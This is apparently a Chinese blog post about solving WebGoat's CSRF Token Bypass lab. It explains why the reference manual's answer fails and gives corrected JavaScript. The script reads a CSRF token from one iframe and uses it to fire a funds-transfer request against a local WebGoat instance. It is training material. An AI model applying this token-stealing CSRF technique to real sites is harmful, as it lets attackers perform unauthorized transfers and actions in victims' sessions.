nightmare丿
nightmare丿

CSRF Token Bypass再来过

最近使用WebGoat学习Java源码审计,顺便将WebGoat再过一遍,使用WebGoat中文手册作为参考,测试到CSRF Token绕过这个地方时,发现参考答案始终无法通过,仔细研究了下,发现原来是中文手册答案有误,因为耽误了些时间,所以就打算把它记录下来,避免后来人再踩坑。

1、问题分析

WebGoat中文参考手册给出的整理如下:

var tokenvalue;

function readFrame1() {

var frameDoc = document.getElementById("frame1").contentDocument;

var form = frameDoc.getElementsByTagName("form")[1];

var token = form.CSRFToken.value;

tokenvalue = '&CSRFToken='+token;

loadFrame2();

}

function loadFrame2() {

var testFrame = document.getElementById("frame2");

testFrame.src="http://127.0.0.1:8080/WebGoat/attack?Screen=274&menu=900&transferFunds=4000"+tokenvalue;

}

提交答案点击后将得到如下答案:


CSRF Token Bypass再来过_第1张图片

由上图可知第一个iframe被正常加载,但是第二个iframe中的内容却没有被正常加载,使用burp截获交互数据,发现(http://127.0.0.1:8080/WebGoat/attack?Screen=274&menu=900&transferFunds=4000"+tokenvalue)这个请求并没有被发送出去,猜想JS readFrame1方法并没有执行到最后的loadFrame2()这个语句,执行的过程中出现了差错。使用chrome对readFrame1中的代码进行动态调试,调试结果如下图所示:


CSRF Token Bypass再来过_第2张图片

在获取CSRFToken参数值的时候出现了错误,因此基本可以确定答案的错误主要来自于JS获取参数的方法出现了错误。

2、纠正验证

确定了答案的错误,那么就要寻找正确获取CSRFToken参数的方法,下面直接贴出完整的答案代码:

var tokenvalue;

function readFrame1() {

var frameDoc = document.getElementById("frame1").contentDocument;

var form = frameDoc.forms["form"];

var token = form.getElementsByTagName("input").CSRFToken["value"];

tokenvalue = '&CSRFToken='+token;

loadFrame2();

}

function loadFrame2() {

var testFrame = document.getElementById("frame2");

testFrame.src="http://127.0.0.1:8080/WebGoat/attack?Screen=274&menu=900&transferFunds=4000"+tokenvalue;

}

输入参数并提交,这时候看到了让我们兴奋的结果,如下图:


CSRF Token Bypass再来过_第3张图片

刷新下页面,此时页面左边出现了帅气的绿色对勾。此外需要注意的是在进行测试时一定要保证Screen、menu两个参数与页面右边的Parameters参数(如下图)保持一致,否则测试无法通过。


CSRF Token Bypass再来过_第4张图片

你可能感兴趣的:(CSRF Token Bypass再来过)

  • 全链路跟踪关键技术-ThreadLocal txxs 架构
    转自:https://github.com/alibaba/transmittable-thread-local/issues/123应用场景的文章Java多线程上下文传递在复杂场景下的实践byvivo互联网技术(海外商城租户区分)2021-02-01SpringSecurityOAuth2.0认证授权五:用户信息扩展到jwt2021-01-14再谈Token认证,如何快速方便获取用户信息By尹吉
  • 常见Hash算法 LUCIAZZZ 算法哈希算法javaspringboot操作系统spring密码学
    部分内容来源:JavaGuide什么是Hash算法哈希算法也叫散列函数或摘要算法,它的作用是对任意长度的数据生成一个固定长度的唯一标识也叫哈希值、散列值或消息摘要哈希算法的是不可逆的,你无法通过哈希之后的值再得到原值哈希值的作用是可以用来验证数据的完整性和一致性哈希算法可以简单分为两类:加密哈希算法:安全性较高的哈希算法,它可以提供一定的数据完整性保护和数据防篡改能力,能够抵御一定的攻击手段,安全
  • 抖音极速版邀请码是多少,2024新版抖音极速版邀请码有哪些? 熊熊福利
    抖音极速版邀请码是多少呢?拉到文章末尾就可以看到!在文章的结尾可以看到抖音极速版邀请码是多少。抖音极速版邀请码怎么填写第1步首先打开【抖音极速版】客户端,然后点击底部【来赚钱】第2步接着点击【填写邀请码】右侧的【去填写】第3步再输入邀请码,最后点击【立即领取】即可。2024年抖音极速版为了回馈广大用户朋友的支持和厚爱,特推出邀请好友填写邀请码来获得一系列特权的活动。只要您是首次下载抖音极速版,并且
  • 程序是如何生成的-以c语言为例
    一,序言从代码到能跑的程序,整个过程就像“把外文翻译成母语,再组装成能直接用的东西”,一步步来更清楚:源代码(程序员写的代码,如C语言文件)↓预处理(处理#开头的命令,如#include、#define)↓编译(把预处理后的代码转成汇编语言)↓汇编(把汇编语言转成二进制机器码,生成目标文件,如main.o)↓链接(合并多个目标文件和库文件,解决函数/变量地址问题)↓可执行文件(生成能直接运行的文件
  • 可怕!太极书院群毛振华低碳交易骗局曝光!亏损无法出金皆是套路!不要再相信了! 不成功不收费
    太极书院群毛振华低碳交易就是杀猪盘,千万不要被骗了!随着这几年经济的发展,股市也经历了一定的成长,股民越来越多。由于人性的贪婪,市场监管的缺陷,互联网平台监管不力,众多网络骗子便把目光顶到了股民,尤其是处于亏损状态,迫切渴望摆脱被套牢的命运。于是,以微信群,QQ群荐股,开大讲堂荐股,炒股,一步步让股民入坑,受骗。他们通常通过股票交流群的形式,先吸引更多人进来,然后一段时间后,会转到其他软件聊天,进
  • docker镜像加速器配置daemon.json不生效 蓝色天空的银码星 docker容器linux
    现象安装docker26.1.4,启动服务拉取镜像发现超时,走的是官方镜像仓库地址,配置本地加速后/etc/docker/daemon.json,重启仍然走的官方地址加速器地址:https://docker.imgdb.de/dockerinfo|grep'RegistryMirrors'展示的是:io.docker,非我们配置的地址再继续测试:1、不通过系统服务systemctl启动docker
  • 今天是个好日子 走到底的花姑娘
    大学闺蜜下午四点多发信息说她的儿砸提早来报道了。中午快十二点时本想发信息问她最近怎么样了,又考虑到这时间点她可能在吃饭,等下午迟点再联系她。因为她跟我当时怀孕一样有妊娠糖尿病,想了解一下她最近控糖效果如何。结果,我还没来得及问,她就直接告诉我生了,提早了一个月。好在小孩各项指标都比较正常,体重4.3斤,毕竟是早产儿为了保险起见得在保温箱中观察几天。真庆幸母子健康,真替她开心。他们夫妻俩年纪相对也比
  • 今天下雨 恬淡风清
    这会下班的时候明显感到气温下降了很多,穿了夏日短袖走在路上明显冷飕飕的感觉,不是用一般的凉爽来形容,而是有点冷。今天难得坐地铁上下班,早上把电动车放在地铁站,然后坐地铁,现在先坐公交出行再转地铁,刚才记错了,居然坐地铁坐反了,我在定安路坐,以为下一站是城站,就顺着坐了这一方向,坐到近江才反应过来,不对啊,做反了,应该下一站龙翔桥方向,记错了哈,又多坐了一站到江陵路下车,刚好下车对面的也来了,重新坐
  • 中原焦点团队分享网初31期 李丽 坚持第26天 2021.11.6 遇见_afaf
    创造成功经验——让孩子重获信心1.相信一个小小的改变会带来大变化,达到滴水穿石的效果。就像平时我们所说的多米诺骨牌效应一样,我们要关注的就是孩子那一点点的成功经验,让他不断的增加体验,就会有大的变化。2.“再保证”指的是我们对孩子表达:不管发生什么事,我都会爱你这个人,也许你的行为需要修正,但我不会因为你的行为不喜欢你。让孩子感受到不管发生什么事儿,父母永远都爱他,不管发生什么事儿,父母永远都会陪
  • 唯品会新人30元优惠券过期了还可以再领取吗?唯品会新人30元优惠券有效期多久 日常购物小技巧
    探究唯品会新人30元优惠券的有效期及过期后的领取可能性作为一家知名电商平台,唯品会经常为新用户提供优惠券以吸引用户注册和消费。其中,唯品会新人30元优惠券备受关注。本文将针对该优惠券的有效期及过期后是否可再次领取展开探究。一、唯品会新人30元优惠券的有效期根据唯品会的规定,新人30元优惠券通常在用户注册成功后的一段时间内有效。具体有效期可能因唯品会的活动策略而有所不同,一般在1个月左右。在此期间,
  • ollama
    https://ollama.comollamarunllama3.2新建ModelfileFROMllama3.2#设定温度参数为1[更高的更具有创新性,更低的更富有连贯性]PARAMETERtemperature1#将上下文窗口大小设置为4096,这控制着LLM能够使用多少个token来生成下一个token。PARAMETERnum_ctx4096#设置了自定义系统消息以指定聊天助手的行为。你
  • PD分离技术分析 老兵发新帖 人工智能
    PD分离中的“PD”指的是大语言模型(LLM)推理过程中的两个核心阶段:Prefill(预填充)和Decode(解码)。这两个阶段在计算特性和资源需求上存在显著差异,分离部署可优化整体性能。以下是详细解析:一、PD的具体含义Prefill(预填充阶段)任务:处理用户输入的整个提示(Prompt),为所有Token生成初始的键值缓存(KVCache)和隐藏状态(HiddenStates)。特性:计算
  • Python --- day 10 Opencv模块的使用 AnAn__kang pythonopencv开发语言
    系列文章目录前言今天博主带大家进入Opencv的学习,这是一个专门针对处理图像和视频的一个模块,大家以理解为主,增强自己的编程思维,再后续我们训练模型时会大批量的处理图片时会经常用到这个模块。1OpenCV介绍OpenCV(开放源代码计算机视觉库)是一个开源的计算机视觉和机器学习软件库。由一系列C++类和函数构成,用于图像处理、计算机视觉领域的算法实现。1.1OpenCV优势**开源免费:**完全
  • 微信上传素材(永久) ,thumb_media_id 获取 亿水清华
    首先在获取thumb_media_id时所用微信接口是url="https://api.weixin.qq.com/cgi-bin/material/add_material?access_token={}&type={}"通过url获得的media_id可做thumb_media_id使用。注意如果过程中出现40007错误,可能是你和我一样跳入了这个大坑temporary_url="https:
  • bug复现不了开发人员不解决,遇到疑难bug该如何排查 ,这两个方法你需要知道。 雨滴测试 功能测试bug功能测试
    在测试的时候,有时候经常会遇到一些难以复现的bug,比如有的线上bug在少部分用户哪里出现,但是自己复现却是没有问题的;亦或者是在测试环境上发现了一个偶现bug,然后再复现就很难以找到了;亦或者是出现一个技术问题,像环境部署,明明部署的是没有问题,按照正确的步骤来的,但是就是无法访问系统。那么,像这类问题它都属于恢复性问题,就是正常情况下,它都是没有问题的,但是在操作的过程中产生了某些微小变化导致
  • 鲜栗子
    2019年1月26日晴打糍粑的小伙子说今天很暖和我满身浸着汗水细数快乐太阳叉腰发奋展示光芒让我和人们眼里泛着金黄一个跟头下我不说话就是大笑后继续笑等到能站起来后继续出发再跌了跟头后再爬上坡一股劲儿来自无名的女侠羽毛轻盈如即将来的春花儿我是不会被埋没的蜂鸟不需要漂亮就能造出精华
  • 2019.1.24星期四亲子日记95 李妈妈
    图片发自App图片发自App图片发自App大宝被评为三好学生了!一年级的第一学期马上结束了,虽然期末考试的成绩不理想,但是这一学期大宝还是很努力的,大宝的缺点就是学东西还不够扎实,做题的时候读题不认真,不会检查!希望假期里我们一起努力改掉这些坏习惯!让大宝在新的学期里更加的主动认真的去学习,也希望大宝能够再活跃一点,能够积极参与学校的各项活动!做一个全面发展的好学生!!!厦小一年六班李新妈妈
  • 《绝对红人》林小冬白琳全文免费阅读(完整版) 寒风书楼
    《绝对红人》林小冬白琳全文免费阅读(完整版)主角:林小冬白琳简介:副乡长林小冬晚上偶然遇见女上司在办公室受到骚扰,仗义出手,解救上司于危急之中,就在女上司即将以身相许时……关注微信公众号【花车文学】去回个书號【51】,即可阅读【绝对红人】小说全文!冯啸天在学校里虽然不是什么霸王,但是仗着表哥是学校的领导,也算是一号人物,不过看眼前这形势,再硬撑下去是自讨苦吃。好汉不吃眼前亏,道歉就道歉吧,等过了眼
  • 使用qt编写上位机程序,出现串口死掉无法接受数据的bug assassuint QtC++软件开发qtbugc++
    项目场景:使用qt编写上位机程序,出现串口死掉无法接受数据的bug问题描述串口打开后一段时间内可以接受串口数据,过了一段时间后,端口就失去了响应,观察下位机指示灯发现下位机的串口还是在正常发送数据,使用其它串口工具打开也能正常接收数据,当上位机的串口死掉之后关掉串口重新打开又能正常接收数据了,过一会儿又会死掉,关掉串口再重新打开又恢复正常。经调试发现,串口死掉之后时的串口状态仍是open状态,查看
  • 重回择婿那天,我诞下极品孔雀蛋(嘉禾月礼)好看小说-最新章节重回择婿那天,我诞下极品孔雀蛋(嘉禾月礼) 时光里文馆
    《重回择婿那天,我诞下极品孔雀蛋》主角:嘉禾月礼简介:我是孔雀公主,成年那年,全孔雀族的男子都来求娶。我明明选择了血统高贵的绿孔雀青山。成婚后生得却是三等白孔雀。青山看到白孔雀,勃然大怒,一把将孩子摔死,将尚在原形的我割颈拔毛,扔给了野兽分食。嫁给二等蓝孔雀的姐姐,却生下罕见的紫孔雀。她的夫君因此成为新的百鸟之王。再睁眼,回到我选青山做我夫君那日。他当着所有人的面,拒绝我,求娶我的姐姐。我知道他也
  • 静闻心语 追求完美的心 静闻_49c4
    追求完美的心背后是不完美,背后是空洞和匮乏。同事说我处女座的人是追求完美者,说我收拾的桌面就看出来了。表面听着是夸赞,可自己知道,我追求完美的心何时停歇过呀。一天,自己灵性大发写出三篇满意的文章,很有成就感。可有一天,脑子里空空如野,啥也拼凑不出来,焦虑起来了,一天都在思索线索,整理头绪。当一篇文章,从大脑中拼凑整理成形,再落到文字。心失落焦虑的去生活中去发现线索,当发现写文章的线索出现,内心焦虑
  • 致家长朋友们的一封信 韩洼小学董翠玲
    亲爱的家长朋友们:你们好!我是一二班的语文老师董老师,很高兴我们可以通过这样的方式进行沟通、交流。在这里,我想说的是,希望通过这一封信,可以让我们的心灵靠的更近,让我们的家校合作更紧密。我们都知道今年是“双减政策”落地的第一年,孩子们不准再上辅导班,一二年级也不准再布置书面作业,至于其他作业也是在延时课上就完成了。延时课的开展,让孩子们与家长共同相处的时间更少了。以前还有作业可以辅导辅导,通过作业
  • 2018年的回想,我在中化的日子里 文学汇作者
    文/家奴又是一年岁尾,感觉日子过得飞快,嗖嗖嗖就逝去了,再想返回身去,追寻失去的光阴,已经变得遥不可及,日子就是一个过程,一旦远去,再难抓住,每一个人都有自己的日子,周而复始,有改变内容的,也有维持着原状,一成不变的,但日子不论怎么过,我们都有自己的目标,都有自己的追求,想要实现愿望,就需要不停地奋斗。我的2018年,是有意义,有收获的一年,感觉自己又有了进步,又获得了成长,一个人的学历可能几十年
  • 菠萝这么做,美味不上火 一米财富NO1
    现在是吃菠萝的季节,菠萝很美味,相信我们大家都吃过,特别是孩子都喜欢吃菠萝,但是很多朋友都会说吃了菠萝上火。今天听朋友说这样做菠萝,孩子爱吃还不上火,就试做了一次,很简单,也很好吃,分享给大家,希望大家喜欢。菠萝一个,去皮,清洗干净,切成小片,锅里加点水,把菠萝放进去,水没过菠萝就好,中火先烧开转小火煮大约5分钟,再加点冰糖,小火再煮大约十分钟左右关火,放凉就可以吃了,酸酸甜甜真好吃。冰糖可以根据
  • 隐龙出山(陆庆郑青雨)已完结小说推荐_(陆庆郑青雨)全文阅读免费全集-隐龙出山 时光里文馆
    《隐龙出山》主角:陆庆郑青雨,简介:当着哥哥的面,嫂嫂竟然要........“啊,好痛,你慢点啊!”陆庆听到嫂子的娇嗔,连忙将嫂子搀扶起来。开车的陆霸道尴尬道:“山路太难走了,坑坑洼洼的,再坚持一下。”末了又补充了一句:“老婆,要是你觉得太颠簸了,就坐小庆腿上吧。”闻言,陆庆脑袋轰一下炸开了。嫂嫂郑青雨是一个非常漂亮有韵味的女人,一米六五左右的身高,身材略显丰腴。她下身是一条黑色的包臀短裙搭配黑丝
  • 返利app哪个佣金最高?高省APP返利佣金最高 氧惠好项目
    作为一名在从事淘宝的人员,我所知道的返利网其实就是淘宝客,淘宝客是商家推广宣传的一种方式,以成交后给一定百分比的佣金。那些返利网就是一个大的淘宝客推广,你通过返利网进入商品后,其实原商品的链接上加入可淘宝客的信息,你交易成功确认收货后,淘宝会把佣金给淘宝客即返利网,然后返利网再给你。但是现在淘宝网已经不能现金返利了,返的是积分宝。也就不存在什么资金流什么的了。。氧惠(全网优惠上氧惠)——是与以往完
  • 室友得病,嫁祸给我陈然苏倩倩最新完本小说_小说全文免费阅读室友得病,嫁祸给我陈然苏倩倩 绾绾呐
    《室友得病,嫁祸给我》主角:陈然苏倩倩简介:室友得病了,还想传染给我..校花舍友得了脏病,全身起红疹。我告诉她,这是得了脏病,她不相信,还觉得我是妒忌她,找了个那么好的男朋友。她不仅偷偷用我的毛巾,还偷穿我的内裤,致使我得了脏病。我去和她理论,却被她一把从天台推了下。她联合舍友造谣我得了脏病自杀而死,还感染了她和同宿舍的其他舍友。我死后,还被全校骂上热搜。再睁眼,我回到了舍友起红疹的那天。我先是去
  • Word 编写的宏不显示/找不到宏问题解决 拂过世俗的风 word经验分享笔记学习方法
    问题原因分析及解决办法总结问题Word显示找不到宏或宏被禁用。使用AI生成的VBA代码在保存后无法再宏列表中找到。原因分析及解决办法由于安全问题,宏被禁用了。如果你信任宏的来源,可以在Word-文件-选项-信任中心-信任中心设置中,选择“启用所有宏”以及勾选“信任对VBA工程对象模型的访问”并保存。VBA代码有问题。如果VBA代码有问题,比如语法错误(如拼写错误、漏掉ENDSub等)、没有正确保存
  • 2024年1月15日学习记录——有关resnet18的简单再实现 BARBERUM 学习深度学习人工智能
    2024年1月15日学习记录1.有关resnet18重写并训练的任务resnet本意为resdualnet,就是残差神经网络,利用shortcut的连接方式,将特征层隔层连接,在保留原有特征的同时进行深层卷积。可以有效的解决因神经网络层数的叠加而导致的退化问题。根据以下的逻辑图实现:首先图片作为输入,格式为[3,32,32]经过一个7*7的卷积核和一个最大池化层后进入残差结构层第一级残差结构层为两
  • 选择了一件事情,就要把它做好 辰诺一启
    加入了一个日更群,把写作当成了每一天的头等大事。因此,选择早起在家人还没起床的时候,静下心来阅读和写文。谁料今天早上孩子醒的早,打乱了我的计划。一直拖到中午都还没有完成。趁着孩子午睡,再次起来续文。可是思绪已被打断,再重拾起来需要花更长的时间,结果还没有拼回原来的头绪呢,孩子又起来了。宝妈可真是伤不起。但是不管怎么说,决定做一件事情就得克服万难,把它做好。以后还是得向早起要时间,那是我比别人多赚一
  • Spring4.1新特性——综述 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • Schema与数据类型优化 annan211 数据结构mysql
    目前商城的数据库设计真是一塌糊涂,表堆叠让人不忍直视,无脑的架构师,说了也不听。 在数据库设计之初,就应该仔细揣摩可能会有哪些查询,有没有更复杂的查询,而不是仅仅突出 很表面的业务需求,这样做会让你的数据库性能成倍提高,当然,丑陋的架构师是不会这样去考虑问题的。 选择优化的数据类型 1 更小的通常更好 更小的数据类型通常更快,因为他们占用更少的磁盘、内存和cpu缓存,
  • 第一节 HTML概要学习 chenke htmlWebcss
    第一节 HTML概要学习 1. 什么是HTML HTML是英文Hyper Text Mark-up Language(超文本标记语言)的缩写,它规定了自己的语法规则,用来表示比“文本”更丰富的意义,比如图片,表格,链接等。浏览器(IE,FireFox等)软件知道HTML语言的语法,可以用来查看HTML文档。目前互联网上的绝大部分网页都是使用HTML编写的。 打开记事本 输入一下内
  • MyEclipse里部分习惯的更改 Array_06 eclipse
    继续补充中---------------------- 1.更改自己合适快捷键windows-->prefences-->java-->editor-->Content Assist-->      Activation triggers for java的右侧“.”就可以改变常用的快捷键 选中 Text
  • 近一个月的面试总结 cugfy 面试
    本文是在学习中的总结,欢迎转载但请注明出处:http://blog.csdn.net/pistolove/article/details/46753275 前言       打算换个工作,近一个月面试了不少的公司,下面将一些面试经验和思考分享给大家。另外校招也快要开始了,为在校的学生提供一些经验供参考,希望都能找到满意的工作。 
  • HTML5一个小迷宫游戏 357029540 html5
         通过《HTML5游戏开发》摘抄了一个小迷宫游戏,感觉还不错,可以画画,写字,把摘抄的代码放上来分享下,喜欢的同学可以拿来玩玩! <html> <head> <title>创建运行迷宫</title> <script type="text/javascript"
  • 10步教你上传githib数据 张亚雄 git
    官方的教学还有其他博客里教的都是给懂的人说得,对已我们这样对我大菜鸟只能这么来锻炼,下面先不玩什么深奥的,先暂时用着10步干净利索。等玩顺溜了再用其他的方法。 操作过程(查看本目录下有哪些文件NO.1)ls (跳转到子目录NO.2)cd+空格+目录 (继续NO.3)ls (匹配到子目录NO.4)cd+ 目录首写字母+tab键+(首写字母“直到你所用文件根就不再按TAB键了”) (查看文件
  • MongoDB常用操作命令大全 adminjun mongodb操作命令
    成功启动MongoDB后,再打开一个命令行窗口输入mongo,就可以进行数据库的一些操作。输入help可以看到基本操作命令,只是MongoDB没有创建数据库的命令,但有类似的命令 如:如果你想创建一个“myTest”的数据库,先运行use myTest命令,之后就做一些操作(如:db.createCollection('user')),这样就可以创建一个名叫“myTest”的数据库。 一
  • bat调用jar包并传入多个参数 aijuans
    下面的主程序是通过eclipse写的: 1.在Main函数接收bat文件传递的参数(String[] args)  如:   String ip =args[0];          String user=args[1];       &nbs
  • Java中对类的主动引用和被动引用 ayaoxinchao java主动引用对类的引用被动引用类初始化
      在Java代码中,有些类看上去初始化了,但其实没有。例如定义一定长度某一类型的数组,看上去数组中所有的元素已经被初始化,实际上一个都没有。对于类的初始化,虚拟机规范严格规定了只有对该类进行主动引用时,才会触发。而除此之外的所有引用方式称之为对类的被动引用,不会触发类的初始化。虚拟机规范严格地规定了有且仅有四种情况是对类的主动引用,即必须立即对类进行初始化。四种情况如下:1.遇到ne
  • 导出数据库 提示 outfile disabled BigBird2012 mysql
    在windows控制台下,登陆mysql,备份数据库:   mysql>mysqldump -u root -p test test > D:\test.sql 使用命令 mysqldump 格式如下: mysqldump -u root -p *** DBNAME > E:\\test.sql。 注意:执行该命令的时候不要进入mysql的控制台再使用,这样会报
  • Javascript 中的 && 和 || bijian1013 JavaScript&&||
            准备两个对象用于下面的讨论 var alice = { name: "alice", toString: function () { return this.name; } } var smith = { name: "smith",
  • [Zookeeper学习笔记之四]Zookeeper Client Library会话重建 bit1129 zookeeper
    为了说明问题,先来看个简单的示例代码:   package com.tom.zookeeper.book; import com.tom.Host; import org.apache.zookeeper.WatchedEvent; import org.apache.zookeeper.ZooKeeper; import org.apache.zookeeper.Wat
  • 【Scala十一】Scala核心五:case模式匹配 bit1129 scala
    package spark.examples.scala.grammars.caseclasses object CaseClass_Test00 { def simpleMatch(arg: Any) = arg match { case v: Int => "This is an Int" case v: (Int, String)
  • 运维的一些面试题 yuxianhua linux
    1、Linux挂载Winodws共享文件夹   mount -t cifs //1.1.1.254/ok /var/tmp/share/ -o username=administrator,password=yourpass 或 mount -t cifs -o username=xxx,password=xxxx //1.1.1.1/a /win    
  • Java lang包-Boolean BrokenDreams boolean
             Boolean类是Java中基本类型boolean的包装类。这个类比较简单,直接看源代码吧。 public final class Boolean implements java.io.Serializable,
  • 读《研磨设计模式》-代码笔记-命令模式-Command bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.Collection; import java.util.List; /** * GOF 在《设计模式》一书中阐述命令模式的意图:“将一个请求封装
  • matlab下GPU编程笔记 cherishLC matlab
    不多说,直接上代码 gpuDevice % 查看系统中的gpu,,其中的DeviceSupported会给出matlab支持的GPU个数。 g=gpuDevice(1); %会清空 GPU 1中的所有数据,,将GPU1 设为当前GPU reset(g) %也可以清空GPU中数据。 a=1; a=gpuArray(a); %将a从CPU移到GPU中 onGP
  • SVN安装过程 crabdave SVN
    SVN安装过程   subversion-1.6.12   ./configure --prefix=/usr/local/subversion --with-apxs=/usr/local/apache2/bin/apxs --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr --with-openssl=/
  • sql 行列转换 daizj sql行列转换行转列列转行
    行转列的思想是通过case when 来实现 列转行的思想是通过union all 来实现 下面具体例子: 假设有张学生成绩表(tb)如下: Name Subject Result 张三 语文  74 张三 数学  83 张三 物理  93 李四 语文  74 李四 数学  84 李四 物理  94 */ /* 想变成 姓名   &
  • MySQL--主从配置 dcj3sjt126com mysql
    linux下的mysql主从配置: 说明:由于MySQL不同版本之间的(二进制日志)binlog格式可能会不一样,因此最好的搭配组合是Master的MySQL版本和Slave的版本相同或者更低, Master的版本肯定不能高于Slave版本。(版本向下兼容) mysql1  : 192.168.100.1    //master mysq
  • 关于yii 数据库添加新字段之后model类的修改 dcj3sjt126com Model
    rules: array('新字段','safe','on'=>'search') 1、array('新字段', 'safe')//这个如果是要用户输入的话,要加一下, 2、array('新字段', 'numerical'),//如果是数字的话 3、array('新字段', 'length', 'max'=>100),//如果是文本 1、2、3适当的最少要加一条,新字段才会被
  • sublime text3 中文乱码解决 dyy_gusi Sublime Text
    sublime text3中文乱码解决 原因:缺少转换为UTF-8的插件 目的:安装ConvertToUTF8插件包 第一步:安装能自动安装插件的插件,百度“Codecs33”,然后按照步骤可以得到以下一段代码: import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a30980927
  • 概念了解:CGI,FastCGI,PHP-CGI与PHP-FPM geeksun PHP
    CGI CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等。 FastCGI FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行着,只要激活后,不
  • Git push 报错 "error: failed to push some refs to " 解决 hongtoushizi git
    Git push 报错 "error: failed to push some refs to " . 此问题出现的原因是:由于远程仓库中代码版本与本地不一致冲突导致的。 由于我在第一次git pull --rebase 代码后,准备push的时候,有别人往线上又提交了代码。所以出现此问题。 解决方案: 1: git pull    2:
  • 第四章 Lua模块开发 jinnianshilongnian nginxlua
    在实际开发中,不可能把所有代码写到一个大而全的lua文件中,需要进行分模块开发;而且模块化是高性能Lua应用的关键。使用require第一次导入模块后,所有Nginx 进程全局共享模块的数据和代码,每个Worker进程需要时会得到此模块的一个副本(Copy-On-Write),即模块可以认为是每Worker进程共享而不是每Nginx Server共享;另外注意之前我们使用init_by_lua中初
  • java.lang.reflect.Proxy liyonghui160com
      1.简介   Proxy 提供用于创建动态代理类和实例的静态方法 (1)动态代理类的属性 代理类是公共的、最终的,而不是抽象的 未指定代理类的非限定名称。但是,以字符串 "$Proxy" 开头的类名空间应该为代理类保留 代理类扩展 java.lang.reflect.Proxy 代理类会按同一顺序准确地实现其创建时指定的接口
  • Java中getResourceAsStream的用法 pda158 java
    1.Java中的getResourceAsStream有以下几种: 1. Class.getResourceAsStream(String path) : path 不以’/'开头时默认是从此类所在的包下取资源,以’/'开头则是从ClassPath根下获取。其只是通过path构造一个绝对路径,最终还是由ClassLoader获取资源。   2. Class.getClassLoader.get
  • spring 包官方下载地址(非maven) sinnk spring
    SPRING官方网站改版后,建议都是通过 Maven和Gradle下载,对不使用Maven和Gradle开发项目的,下载就非常麻烦,下给出Spring Framework jar官方直接下载路径:   http://repo.springsource.org/libs-release-local/org/springframework/spring/   s
  • Oracle学习笔记(7) 开发PLSQL子程序和包 vipbooks oraclesql编程
        哈哈,清明节放假回去了一下,真是太好了,回家的感觉真好啊!现在又开始出差之旅了,又好久没有来了,今天继续Oracle的学习!      这是第七章的学习笔记,学习完第六章的动态SQL之后,开始要学习子程序和包的使用了……,希望大家能多给俺一些支持啊!     编程时使用的工具是PLSQL
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他